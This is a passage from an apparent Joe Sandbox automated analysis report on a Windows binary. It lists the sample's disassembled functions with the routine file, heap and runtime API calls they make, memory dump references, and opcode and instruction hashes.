                                    • Opcode Fuzzy Hash: 81c363b79ee68f335f4dec3db36d0c3dbe85684283902a5576e07fc2673e38a2
                                    • Instruction Fuzzy Hash: 17A011A22AC002BC303A2200AC0AE3A022CC8C0BA3330880AF80BA80E0A880280C0830
                                    Function 0036B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0036AF1B: GetOEMCP.KERNEL32(00000000,?,?,0036B1A5,?), ref: 0036AF46
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0036B1EA,?,00000000), ref: 0036B3C4
                                    • GetCPInfo.KERNEL32(00000000,0036B1EA,?,?,?,0036B1EA,?,00000000), ref: 0036B3D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID:
                                    • API String ID: 546120528-0
                                    • Opcode ID: 616f29819e3d10df5468010b0dafc3f5e114292d58bfc7155ded8906de038e63
                                    • Instruction ID: 61674c07664ab3956d9fd290841a08ed48caf1c788c1a39a2a79e952e1b580c3
                                    • Opcode Fuzzy Hash: 616f29819e3d10df5468010b0dafc3f5e114292d58bfc7155ded8906de038e63
                                    • Instruction Fuzzy Hash: 455124709002059EDB239F36C8816BAFBE9EF45310F18C4AED096CB257DB359986CF91
                                    Function 00352C42 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00352DA4
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00352DBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID:
                                    • API String ID: 2005118841-0
                                    • Opcode ID: e4fd7110e9b1170639354c3b77891b66ac7df074072dbbf0d15452a3df054ab5
                                    • Instruction ID: 9ad9271319505fec1fc0734192b5e2d9707c7dcc91e65a9e7d34bcbe47e0d917
                                    • Opcode Fuzzy Hash: e4fd7110e9b1170639354c3b77891b66ac7df074072dbbf0d15452a3df054ab5
                                    • Instruction Fuzzy Hash: C94114B0A087416BD72EEA74D484F9AF7E4BF92305F04052AEE6947162C774A84CC795
                                    Function 00341385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00346057: __EH_prolog.LIBCMT ref: 0034605C
                                      • Part of subcall function 0034C827: __EH_prolog.LIBCMT ref: 0034C82C
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C86F
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C893
                                    • new.LIBCMT ref: 003413FE
                                      • Part of subcall function 0034B07D: __EH_prolog.LIBCMT ref: 0034B082
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: ee3b51ea0f3b51f2ae8b4ddb0e676dcb86ad32d63f9b95e3ce69986ce97f4fc9
                                    • Instruction ID: a5a7895880dc5a7b301e6057475050de07d04297f9716acd82c35e510d23f0ec
                                    • Opcode Fuzzy Hash: ee3b51ea0f3b51f2ae8b4ddb0e676dcb86ad32d63f9b95e3ce69986ce97f4fc9
                                    • Instruction Fuzzy Hash: F94136B0805B409EE726DF7984859E7FBE5FF18310F404A6ED6EE8B282CB326554CB11
                                    Function 00341380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00341385
                                      • Part of subcall function 00346057: __EH_prolog.LIBCMT ref: 0034605C
                                      • Part of subcall function 0034C827: __EH_prolog.LIBCMT ref: 0034C82C
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C86F
                                      • Part of subcall function 0034C827: new.LIBCMT ref: 0034C893
                                    • new.LIBCMT ref: 003413FE
                                      • Part of subcall function 0034B07D: __EH_prolog.LIBCMT ref: 0034B082
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: b3ccb5d11b75d756da2080d8f410e5325f34b93e87dad08b7dac05a9357e3bdf
                                    • Instruction ID: 7011cf56f2935a2e643ba01fe6476789ae7fdaa304e28821cc525221c59acf9b
                                    • Opcode Fuzzy Hash: b3ccb5d11b75d756da2080d8f410e5325f34b93e87dad08b7dac05a9357e3bdf
                                    • Instruction Fuzzy Hash: 2C4144B0805B409EE726DF798485AE7FBE5FF19310F404A6ED5EE8B282CB326554CB11
                                    Function 0034971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00349EDC,?,?,00347867), ref: 003497A6
                                    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00349EDC,?,?,00347867), ref: 003497DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 95b66d6a38ec191d46d27162af8a9e0385854846eb8e381d8286d872c91c0961
                                    • Instruction ID: 8e7d36aaaaec2798ae96b0713e0663e8a0e6ed97e4ea66f86580794805ef1290
                                    • Opcode Fuzzy Hash: 95b66d6a38ec191d46d27162af8a9e0385854846eb8e381d8286d872c91c0961
                                    • Instruction Fuzzy Hash: 3721E4B1114748AEE7318F64C885BA7BBECEB49764F00492EF5E58A191C374BC889B61
                                    Function 00349D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00347547,?,?,?,?), ref: 00349D7C
                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00349E2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File$BuffersFlushTime
                                    • String ID:
                                    • API String ID: 1392018926-0
                                    • Opcode ID: 2afb7ca4883b2d0f26d7664169f4907a9bd9ee44ad598db598410411e0d5d0be
                                    • Instruction ID: 983435e31bd89519f936a35d7151d3ba8039cf4ffb87a2a47e4a056241f4d7c5
                                    • Opcode Fuzzy Hash: 2afb7ca4883b2d0f26d7664169f4907a9bd9ee44ad598db598410411e0d5d0be
                                    • Instruction Fuzzy Hash: 5F21F632548246AFC716DF24C491FABBBE8AF92304F05085EB8D18B151D329EA0CDB51
                                    Function 0036A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,00373958), ref: 0036A4B8
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0036A4C5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: 30b7d1f37b2fe1783d103daf6c16b1b44f969c609475bb878e4e5f32412cad1c
                                    • Instruction ID: eb0faea121c0eb6ada93c24f0e2c5f47965ec0e41d908c4763147281c3dfe50b
                                    • Opcode Fuzzy Hash: 30b7d1f37b2fe1783d103daf6c16b1b44f969c609475bb878e4e5f32412cad1c
                                    • Instruction Fuzzy Hash: CB110D336019209B9B379E2AEC4495A73999B85760B17C150FD15FF35CDE70DC41CAD1
                                    Function 00349B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00349B35,?,?,00000000,?,?,00348D9C,?), ref: 00349BC0
                                    • GetLastError.KERNEL32 ref: 00349BCD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer
                                    • String ID:
                                    • API String ID: 2976181284-0
                                    • Opcode ID: 1515018dd1d605eb1e6e8ec04bdc13364a96d589b46452a8f719bd2fc15494f2
                                    • Instruction ID: 5a2ab910a8224e2479bd40570d0015c72bf369638ab222db0a3d7f32b5dcd335
                                    • Opcode Fuzzy Hash: 1515018dd1d605eb1e6e8ec04bdc13364a96d589b46452a8f719bd2fc15494f2
                                    • Instruction Fuzzy Hash: 090104313042159F8B1ACE65AC84B7FB7DDEFC0321B10462FF8168F280CA30F805AA21
                                    Function 00349E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00349E76
                                    • GetLastError.KERNEL32 ref: 00349E82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer
                                    • String ID:
                                    • API String ID: 2976181284-0
                                    • Opcode ID: 95d7e049ce39be3bbec0da403971457ee1bf32a811d7b24553b847992ca18197
                                    • Instruction ID: 13374fe5c7dfd6e1cc1735850b66f7f6a0ea61097eb6f6e86ef808d0e5b754ad
                                    • Opcode Fuzzy Hash: 95d7e049ce39be3bbec0da403971457ee1bf32a811d7b24553b847992ca18197
                                    • Instruction Fuzzy Hash: BF01DE713002005BEB36DE29CC48B6BB6DDDB88314F11493EB186CA680CA30FC8C8B11
                                    Function 00368606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00368627
                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00380F50,0034CE57,?,?,?,?,?,?), ref: 00368663
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Heap$AllocAllocate_free
                                    • String ID:
                                    • API String ID: 2447670028-0
                                    • Opcode ID: 902150aa2d054cb8a5ababa6a9c9575956db942f9846d440bbde936127139164
                                    • Instruction ID: 1eb6328d6d474d1a88a0a5bfb38aadd2f10636f07c61d0b026c33ba0fae85195
                                    • Opcode Fuzzy Hash: 902150aa2d054cb8a5ababa6a9c9575956db942f9846d440bbde936127139164
                                    • Instruction Fuzzy Hash: 9CF0F63110111566CB332B25EC00F6F3B5C9FDA7B0F26C315FA549A19DDF70C80155A5
                                    Function 00350908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?), ref: 00350915
                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 0035091C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Process$AffinityCurrentMask
                                    • String ID:
                                    • API String ID: 1231390398-0
                                    • Opcode ID: e48c96e8f1a501b0e602fa7b57a0b9ca4b03f903d16a1184d8b22bf13ae8fefb
                                    • Instruction ID: 5de0abcecf541277895341ce31b4d93a50d26c564b3e79f5bd82846286d1791b
                                    • Opcode Fuzzy Hash: e48c96e8f1a501b0e602fa7b57a0b9ca4b03f903d16a1184d8b22bf13ae8fefb
                                    • Instruction Fuzzy Hash: 83E09B72A1010AAB6F1FCAB49C04CFB739DEB043167114179EC4BD3125F731DD058660
                                    Function 0034A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A458
                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A489
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 38c595d5c8e05ef221c1a6d8b31c2f7623893c85455fafa14e12296c9dc7b608
                                    • Instruction ID: 41bcaa7d3f8df4d7dbd428f074f28fd3c650d1786ca014290f28e2050baa87cf
                                    • Opcode Fuzzy Hash: 38c595d5c8e05ef221c1a6d8b31c2f7623893c85455fafa14e12296c9dc7b608
                                    • Instruction Fuzzy Hash: CDF0A03128420D7BDF135F60DC05FD977ACBF04381F048051BC8C8A261DB76DAA8AE50
                                    Function 0035D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemText_swprintf
                                    • String ID:
                                    • API String ID: 3011073432-0
                                    • Opcode ID: 0e52c67092c63825849f92e0b6d73b1a9c8d79bd2c0594e2768ea277b812df85
                                    • Instruction ID: bf5f2bf393643abcaeb860d4c316d447d7b6bb1775bffca6de10d402c7f91d7a
                                    • Opcode Fuzzy Hash: 0e52c67092c63825849f92e0b6d73b1a9c8d79bd2c0594e2768ea277b812df85
                                    • Instruction Fuzzy Hash: 2BF0EC7250034C7ADB23AB709C06F9A379C9B05747F0409D5BB009B0B2DE716A644761
                                    Function 0034A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileW.KERNELBASE(?,?,?,0034984C,?,?,00349688,?,?,?,?,00371FA1,000000FF), ref: 0034A13E
                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0034984C,?,?,00349688,?,?,?,?,00371FA1,000000FF), ref: 0034A16C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 64e9eadb1481fe9dae95d36dc74a2fe40d7242d7abf4a6d815444d9a3c1d3f57
                                    • Instruction ID: a92bd81547f826ff9d2ac3d097b1ea6d2c62e425a34db03b7fa3fbe6e3971605
                                    • Opcode Fuzzy Hash: 64e9eadb1481fe9dae95d36dc74a2fe40d7242d7abf4a6d815444d9a3c1d3f57
                                    • Instruction Fuzzy Hash: 8BE092796802086BDB129F60DC41FE9779CAB08382F484065BC88CB060DB61EED8AA90
                                    Function 0035A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00371FA1,000000FF), ref: 0035A3D1
                                    • CoUninitialize.COMBASE(?,?,?,?,00371FA1,000000FF), ref: 0035A3D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: GdiplusShutdownUninitialize
                                    • String ID:
                                    • API String ID: 3856339756-0
                                    • Opcode ID: 133adf86d4c7ed9bdbef3648ca8a56cc9e41ec3c349bfc5c3a33184eed0350e1
                                    • Instruction ID: 64f1e52537e2ab5df16b8e4a00588e78ea4336dcb4c4c81bf9f120e7402daf2f
                                    • Opcode Fuzzy Hash: 133adf86d4c7ed9bdbef3648ca8a56cc9e41ec3c349bfc5c3a33184eed0350e1
                                    • Instruction Fuzzy Hash: 55F03032558A54DFC7129B4DDC45B55FBACFB89B20F04476AF41983B61CB746800CB91
                                    Function 0034A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,?,?,0034A189,?,003476B2,?,?,?,?), ref: 0034A1A5
                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0034A189,?,003476B2,?,?,?,?), ref: 0034A1D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 76d80bc3ef95e6a5150fc6290e3bfd634e62476f514f801d9846723961b4ef31
